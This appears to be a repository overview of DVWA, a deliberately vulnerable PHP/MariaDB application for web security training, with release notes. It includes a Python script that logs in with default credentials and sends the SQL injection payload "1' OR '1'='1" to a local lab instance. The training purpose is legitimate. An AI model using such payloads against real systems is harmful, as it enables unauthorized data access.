DVWA: Deliberately vulnerable web application for security training
PHP/MariaDB training platform for web security exploitation practice.
Learn more about DVWA
DVWA is a PHP-based web application backed by MariaDB that contains documented and undocumented security vulnerabilities across multiple difficulty levels. The application runs on standard web server stacks like XAMPP and is designed to be deployed in isolated environments such as virtual machines with NAT networking. It implements common web vulnerabilities including SQL injection, cross-site scripting, authentication bypass, and other OWASP-related issues with adjustable complexity settings. The tool serves as a practice platform for security professionals, developers learning secure coding practices, and students in classroom settings studying web application security.
Adjustable Difficulty Levels
Vulnerabilities scale across multiple difficulty settings from low to high complexity. Enables progressive learning paths for beginners through advanced security practitioners without requiring separate environments.
Undocumented Vulnerability Discovery
Contains intentional security flaws beyond the documented exercises, requiring active reconnaissance and analysis. Simulates real-world penetration testing scenarios where not all vulnerabilities are explicitly cataloged.
Isolated Deployment Model
Architected exclusively for VM-based isolated environments with explicit network isolation requirements. Prevents accidental internet exposure of vulnerable code through clear deployment constraints and security warnings.
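```python
import re
import requests

BASE = 'http://localhost/DVWA'  # local, isolated lab instance only
session = requests.Session()
# The login form embeds an anti-CSRF user_token; send it back if present
page = session.get(f'{BASE}/login.php', timeout=10)
match = re.search(r"name=['\"]user_token['\"]\s+value=['\"]([0-9a-f]+)['\"]", page.text)
login_data = {'username': 'admin', 'password': 'password', 'Login': 'Login'}
if match:
    login_data['user_token'] = match.group(1)
session.post(f'{BASE}/login.php', data=login_data, timeout=10)
# Test SQL injection vulnerability (low security)
payload = "1' OR '1'='1"
response = session.get(f'{BASE}/vulnerabilities/sqli/', params={'id': payload, 'Submit': 'Submit'}, timeout=10)
print(response.text)
```
Introduces a new OpenAPI module for testing vulnerable API endpoints; release notes do not specify breaking changes or upgrade requirements.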
- Explore the new OpenAPI module to practice identifying and exploiting API vulnerabilities in a controlled environment.
- Review module documentation for setup steps, as release notes omit configuration details and dependency requirements.
A new crypto module is now available in the main branch; release notes do not specify breaking changes or upgrade requirements.
- Review the merged crypto module for new cryptographic functionality in your DVWA deployment.
- Check application code for integration points if you rely on custom cryptographic operations.
Adds built-in container support for easier deployment; release notes do not specify breaking changes or requirements.
- Deploy DVWA using new built-in container configurations contributed by @hoang-himself.
- Review container setup documentation as migration steps and compatibility details are not provided in release notes.
Related Repositories
Discover similar tools and frameworks used by developers
fail2ban
Log-based intrusion prevention via dynamic firewall management.
semgrep
Pattern-based code scanner for 30+ languages.
CyberChef
Browser-based data transformation tool with chainable operations.
fingerprintjs
Client-side JavaScript library for browser fingerprinting and visitor identification.
httpx
Fast HTTP probing with response metadata extraction.